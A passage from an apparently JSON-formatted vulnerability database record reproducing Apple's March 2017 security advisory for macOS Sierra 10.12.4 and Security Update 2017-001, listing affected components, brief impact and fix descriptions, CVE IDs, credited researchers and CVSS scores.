This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:52:03", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", 
"CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", "CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", "CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", "CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", "CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2017-08-29T02:52:03", "id": "APPLE:HT207615", "href": 
"https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:57", "description": "# About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nThis document describes the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. 
These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory 
management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: 
John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. 
This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel 
privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute 
arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. 
This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. 
This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. 
This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang (@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in a group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. 
This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: August 29, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
